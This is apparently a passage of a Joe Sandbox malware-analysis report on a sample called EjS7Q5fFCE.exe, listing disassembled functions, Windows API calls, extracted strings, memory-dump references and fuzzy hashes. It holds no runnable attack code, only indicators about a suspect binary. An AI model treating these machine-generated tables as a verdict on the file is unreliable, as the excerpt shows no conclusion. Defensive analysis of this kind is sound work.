                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                              • String ID:
                                                              • API String ID: 1868215902-0
                                                              • Opcode ID: c9bacbcb0d94a4237604ba025a7fc8c6fc3f73d5c554c6296987a507abdb518c
                                                              • Instruction ID: 53595dd02a0a5acb8bdd26c106b6aa70cd04b622ddde3f78357202576a3d5cb1
                                                              • Opcode Fuzzy Hash: c9bacbcb0d94a4237604ba025a7fc8c6fc3f73d5c554c6296987a507abdb518c
                                                              • Instruction Fuzzy Hash: 98017571100B44EFC7229F64DD84BC6FBA9FB08B52F00092EF15B521A5C7B5BA54CB58
                                                              Function 0044C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 0044C817
                                                                • Part of subcall function 00448DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0044C896,?,00000000,?,00000000,?,0044C8BD,?,00000007,?,?,0044CCBA,?), ref: 00448DE2
                                                                • Part of subcall function 00448DCC: GetLastError.KERNEL32(?,?,0044C896,?,00000000,?,00000000,?,0044C8BD,?,00000007,?,?,0044CCBA,?,?), ref: 00448DF4
                                                              • _free.LIBCMT ref: 0044C829
                                                              • _free.LIBCMT ref: 0044C83B
                                                              • _free.LIBCMT ref: 0044C84D
                                                              • _free.LIBCMT ref: 0044C85F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: c04c466634066f2ff46a934b17603eb81bb84784741351e84f5e018367963190
                                                              • Instruction ID: 80854a4d745ac3800a2569bcc6fd193e240cb305436a7a6b3c7625e2e26fad42
                                                              • Opcode Fuzzy Hash: c04c466634066f2ff46a934b17603eb81bb84784741351e84f5e018367963190
                                                              • Instruction Fuzzy Hash: 08F06872912200ABA654EB66E5C6C0B73E9AA107167580C2FF104D7653CF78FC40C65C
                                                              Function 00431FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00431FE5
                                                              • _wcslen.LIBCMT ref: 00431FF6
                                                              • _wcslen.LIBCMT ref: 00432006
                                                              • _wcslen.LIBCMT ref: 00432014
                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0042B371,?,?,00000000,?,?,?), ref: 0043202F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CompareString
                                                              • String ID:
                                                              • API String ID: 3397213944-0
                                                              • Opcode ID: 2594d0998a91d66ae33886c19406942d4ae4f02fe36dd6ef8c17ff3d8e6668f6
                                                              • Instruction ID: 1993a8b2b0c02ed154f79c8ba96d7b11402a49e5ed9f2418f4fccda91984e224
                                                              • Opcode Fuzzy Hash: 2594d0998a91d66ae33886c19406942d4ae4f02fe36dd6ef8c17ff3d8e6668f6
                                                              • Instruction Fuzzy Hash: 6AF09032008114BFDF261F51EC09DCE3F26EB45B76F21801AF62A5B061CB72DA65D6D8
                                                              Function 004315FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _swprintf
                                                              • String ID: %ls$%s: %s
                                                              • API String ID: 589789837-2259941744
                                                              • Opcode ID: 6421715aed9561ebb90af71700606af0f7f7fb08664f50b72e8f81c322f9c890
                                                              • Instruction ID: 093e2c702aec9418d01e6a103aaf5072598a1415ae3519ec3608f203ddd7c6bf
                                                              • Opcode Fuzzy Hash: 6421715aed9561ebb90af71700606af0f7f7fb08664f50b72e8f81c322f9c890
                                                              • Instruction Fuzzy Hash: 9F510D35388300F7E62526D18D47F367255AB0CB08F24650BF787690F1CAAF94226B1F
                                                              Function 00447F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\EjS7Q5fFCE.exe,00000104), ref: 00447FAE
                                                              • _free.LIBCMT ref: 00448079
                                                              • _free.LIBCMT ref: 00448083
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _free$FileModuleName
                                                              • String ID: C:\Users\user\Desktop\EjS7Q5fFCE.exe
                                                              • API String ID: 2506810119-1756468577
                                                              • Opcode ID: d5c93ad65ed9957763dbac393a8e824a974159637ab22489d0a50a365645f7bc
                                                              • Instruction ID: aa82af9296b97ebcac54acc4224a09ad7d5389c4afc68abbcdeff20df1318fe9
                                                              • Opcode Fuzzy Hash: d5c93ad65ed9957763dbac393a8e824a974159637ab22489d0a50a365645f7bc
                                                              • Instruction Fuzzy Hash: 2631A2B1A00208AFEB21DF99D88099EBBF8EB95314F11406FF504A7211DBB58E45CB59
                                                              Function 004431D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 004431FB
                                                              • _abort.LIBCMT ref: 00443306
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: EncodePointer_abort
                                                              • String ID: MOC$RCC
                                                              • API String ID: 948111806-2084237596
                                                              • Opcode ID: 1eedd4f9345ef8d7a93c0f94979a8df8883fbc729a6ff25b38022c69ee1c161e
                                                              • Instruction ID: 59f4ae9dabd18822627ffe1aa1d97eb133015ec0aad7b3dc1fa6301c693ca18c
                                                              • Opcode Fuzzy Hash: 1eedd4f9345ef8d7a93c0f94979a8df8883fbc729a6ff25b38022c69ee1c161e
                                                              • Instruction Fuzzy Hash: 7D418D71900209AFEF15DF94CD82AEEBBB5FF48705F14809AF90467212D379EA50DB58
                                                              Function 00427401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00427406
                                                                • Part of subcall function 00423BBA: __EH_prolog.LIBCMT ref: 00423BBF
                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 004274CD
                                                                • Part of subcall function 00427A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00427AAB
                                                                • Part of subcall function 00427A9C: GetLastError.KERNEL32 ref: 00427AF1
                                                                • Part of subcall function 00427A9C: CloseHandle.KERNEL32(?), ref: 00427B00
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                              • API String ID: 3813983858-639343689
                                                              • Opcode ID: 4f5c59201ed98a5e2ac0806c9a2277db92faba1bc3907c52dfac8c0b3558b7e2
                                                              • Instruction ID: f72dbcc60d4ffe00f5da36e54d6a2e501e3171aafd9a502ddb31c8baf49d9e3c
                                                              • Opcode Fuzzy Hash: 4f5c59201ed98a5e2ac0806c9a2277db92faba1bc3907c52dfac8c0b3558b7e2
                                                              • Instruction Fuzzy Hash: 1431D771F04268BADF11EFA5AC45BEFBB78AF09308F44401BF404A7292D77C4A848769
                                                              Function 0043AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00421316: GetDlgItem.USER32(00000000,00003021), ref: 0042135A
                                                                • Part of subcall function 00421316: SetWindowTextW.USER32(00000000,004535F4), ref: 00421370
                                                              • EndDialog.USER32(?,00000001), ref: 0043AD98
                                                              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0043ADAD
                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 0043ADC2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: ASKNEXTVOL
                                                              • API String ID: 445417207-3402441367
                                                              • Opcode ID: 52944a8f91c60336dbc9ca0e4227e9cf428ba84ee46211f88ed79f79a775ad99
                                                              • Instruction ID: fd0be80340ca74b438b0302e04bb48fb9f223aac1bb71ecae915bb4667dc700a
                                                              • Opcode Fuzzy Hash: 52944a8f91c60336dbc9ca0e4227e9cf428ba84ee46211f88ed79f79a775ad99
                                                              • Instruction Fuzzy Hash: A511B4322C0210AFD2118F69AC45F6A376AAB4E702F40041AF280DB5B0C7699926972E
                                                              Function 0043DDA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DialogBoxParamW.USER32(GETPASSWORD1,00010484,0043B270,?,?), ref: 0043DE18
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: DialogParam
                                                              • String ID: GETPASSWORD1$rC$xzG
                                                              • API String ID: 665744214-1110923302
                                                              • Opcode ID: bdf0f5e04a6ebdefdc0ca46e5ff85a51e8ce18c6d1284f5d1726aa771f90adcf
                                                              • Instruction ID: 38c38b7957f3e707f4bb706bbfdc9e17d17c6ab0361f1ec7eba45d70336efb9a
                                                              • Opcode Fuzzy Hash: bdf0f5e04a6ebdefdc0ca46e5ff85a51e8ce18c6d1284f5d1726aa771f90adcf
                                                              • Instruction Fuzzy Hash: 8C113B32640154AADB11DE34BC46BAF3798A70A751F14403AFD49AB181DBBCAC84C76D
                                                              Function 0042D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __fprintf_l.LIBCMT ref: 0042D954
                                                              • _strncpy.LIBCMT ref: 0042D99A
                                                                • Part of subcall function 00431DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00461030,00000200,0042D928,00000000,?,00000050,00461030), ref: 00431DC4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                              • String ID: $%s$@%s
                                                              • API String ID: 562999700-834177443
                                                              • Opcode ID: be7ec90cb268b0be71c73fbb7008f8c37b042bf22410f34242167bf53ef92d5b
                                                              • Instruction ID: 81e73822ce8f6d41c853494676b7438e01f4ef83e1930afe68e29cbbcb44d38c
                                                              • Opcode Fuzzy Hash: be7ec90cb268b0be71c73fbb7008f8c37b042bf22410f34242167bf53ef92d5b
                                                              • Instruction Fuzzy Hash: 9321D572A00258AEEB21DFA4DC01FDF3BACAF05304F500017F910962A2E239D688CB59
                                                              Function 00430E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0042AC5A,00000008,?,00000000,?,0042D22D,?,00000000), ref: 00430E85
                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0042AC5A,00000008,?,00000000,?,0042D22D,?,00000000), ref: 00430E8F
                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0042AC5A,00000008,?,00000000,?,0042D22D,?,00000000), ref: 00430E9F
                                                              Strings
                                                              • Thread pool initialization failed., xrefs: 00430EB7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                              • String ID: Thread pool initialization failed.
                                                              • API String ID: 3340455307-2182114853
                                                              • Opcode ID: 3dcdd1da1489749dcabc561e594ba3e915ae50ede5f2ebdf2e08fe4d318bdc85
                                                              • Instruction ID: 3afbf8d8ac8f07ba118d84fdad102d2c821bfce86068d40455e53b6ed3c2c405
                                                              • Opcode Fuzzy Hash: 3dcdd1da1489749dcabc561e594ba3e915ae50ede5f2ebdf2e08fe4d318bdc85
                                                              • Instruction Fuzzy Hash: 7111BFB17007089FD3205F6A9C859A7FBECEB68745F10482FF1CA82201D67999408B58
                                                              Function 0042124F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Malloc
                                                              • String ID: (C$2C$A
                                                              • API String ID: 2696272793-3604884662
                                                              • Opcode ID: 3d53c1eef797afe802f5d43b6168756a14e3a1b350c25c8ae05bdbd347e80a70
                                                              • Instruction ID: 59ac17816077b4d11d5e96931373abc9ed3f8e9707b8d7fc296587abf3c55cd6
                                                              • Opcode Fuzzy Hash: 3d53c1eef797afe802f5d43b6168756a14e3a1b350c25c8ae05bdbd347e80a70
                                                              • Instruction Fuzzy Hash: B1011B75901229ABCB14CFA4E844ADEBBF8EF09700B10416AE905E3310D7349A40DFA8
                                                              Function 0043DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                              • API String ID: 0-56093855
                                                              • Opcode ID: 134fe0a961820b203af1be5fa61186e77a9f43e50d6c218d9daf60a12a13133e
                                                              • Instruction ID: abecda5166ff1ba9a39c8f326874ad11ab5f5eb953c0c9b85a40ea0b09e4c7e5
                                                              • Opcode Fuzzy Hash: 134fe0a961820b203af1be5fa61186e77a9f43e50d6c218d9daf60a12a13133e
                                                              • Instruction Fuzzy Hash: 7D019E76A04245AFEB118F64FC44A5B7BA8E70D354F10553BF80582230EA748C90DBAE
                                                              Function 00421316 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0042E2E8: _swprintf.LIBCMT ref: 0042E30E
                                                                • Part of subcall function 0042E2E8: _strlen.LIBCMT ref: 0042E32F
                                                                • Part of subcall function 0042E2E8: SetDlgItemTextW.USER32(?,0045E274,?), ref: 0042E38F
                                                                • Part of subcall function 0042E2E8: GetWindowRect.USER32(?,?), ref: 0042E3C9
                                                                • Part of subcall function 0042E2E8: GetClientRect.USER32(?,?), ref: 0042E3D5
                                                              • GetDlgItem.USER32(00000000,00003021), ref: 0042135A
                                                              • SetWindowTextW.USER32(00000000,004535F4), ref: 00421370
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                              • String ID: C$0
                                                              • API String ID: 2622349952-107790966
                                                              • Opcode ID: 25006c4e28a671e0c3ed826191da431ac076197f1054f76d0e6fe9ad1d8394e9
                                                              • Instruction ID: bc5fcbfc1dd1f03c6eaadc3580a3fdbb0ac0ef13c800897d29a18b95b56fd759
                                                              • Opcode Fuzzy Hash: 25006c4e28a671e0c3ed826191da431ac076197f1054f76d0e6fe9ad1d8394e9
                                                              • Instruction Fuzzy Hash: A9F0A4312042ACA6EF154F51EC0D7EA3B5BAF20745F49856AFC4550AB1DB7CC990DB18
                                                              Function 00449A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: __alldvrm$_strrchr
                                                              • String ID:
                                                              • API String ID: 1036877536-0
                                                              • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                              • Instruction ID: 79a899db6b64cf4eb22c030aa4dd863a85af5b6b0ff83337dd2232a67dc592f8
                                                              • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                              • Instruction Fuzzy Hash: 24A135729002869FFB25CE29C8817AFBBE5EF55310F1841AFE4859B381C63C9D41E759
                                                              Function 0042A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00427F69,?,?,?), ref: 0042A3FA
                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00427F69,?), ref: 0042A43E
